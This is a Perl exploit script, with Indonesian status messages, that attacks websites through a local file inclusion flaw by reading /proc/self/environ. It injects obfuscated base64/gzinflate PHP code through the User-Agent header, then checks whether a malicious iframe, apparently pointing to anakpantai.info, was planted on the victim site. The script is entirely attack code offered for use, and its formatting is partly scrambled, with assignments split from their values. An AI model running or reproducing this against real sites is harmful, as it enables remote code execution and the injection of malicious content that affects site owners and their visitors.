#!

/usr/bin/perl
# Simple Shell Jaad via LFI Bugz (/proc/self/environ)
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
if (@ARGV != 2) { print "\n[!] perl $0 <target> <bug>\n"; exit(); }
$target
$lfibug
$environ
$host
$path

=
=
=
=
=

$ARGV[0];
$ARGV[1];
'../../../../../../../../../../../../../../../proc/self/environ%00';
'';
'';

if ($target =~ /http:\/\// ) { $target = str_replace($target,"http:\/\/",''); }
if ($target =~ /^(.+?)\/(.+)$/) { ($host,$path) = ($1,$2); } else { $host = $tar
get; }
$xpl = $target.'/'.$lfibug.$environ;
$content = get_content($xpl);
if ($content =~ /DOCUMENT_ROOT=\// && $content =~ /HTTP_USER_AGENT/) {
my $cmd = "<?eval(gzinflate(base64_decode(\"K0gsLi7JKCrVUE9NzshXULfJTCtKzE1V
KC5KtlVKzEvMLkjMK0nM1MvMS8tXsrPRh0jbqSvY2Slk5qWkVugVZBSoa1oDAA==\")));?>";
my $sock = IO::Socket::INET->new(PeerAddr => "$host", PeerPort => "80", Prot
o => "tcp") or die("\n[!] $host -> Koneksi Gagal !!!\n");
print $sock "GET /".$path.'/'.$lfibug.$environ." HTTP/1.0\r\nHost: $host\r\n
Accept: */*\r\nUser-Agent: ".$cmd."\r\n\r\n";
close($sock);
sleep(2);
my $check = get_content($target.'/logz');
if (($check =~ /anakpantai.info/) or ($check =~ /<\/iframe>/)) {
print "\n[+] 3SUCCESS -> Iframe Loaded!\n";
}
else { print "\n[!] $host -> Gagal.\n"; }
}
else { print "\n[!] $host -> Tidak Terdapat \"HTTP_USER_AGENT\"\n"; }
sub get_content {
my $url = $_[0];
my $ua = LWP::UserAgent->new(agent => "Mozilla/5.0 (Windows; U; Windows NT
5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6");
$ua->timeout(15);
my $req = HTTP::Request->new(GET => 'http://'.$url);
my $response = $ua->request($req);
return $response->content;
}
sub str_replace {
my $source = shift;
my $search = shift;
my $replace = shift;
$source =~ s/$search/$replace/ge;
return $source;
}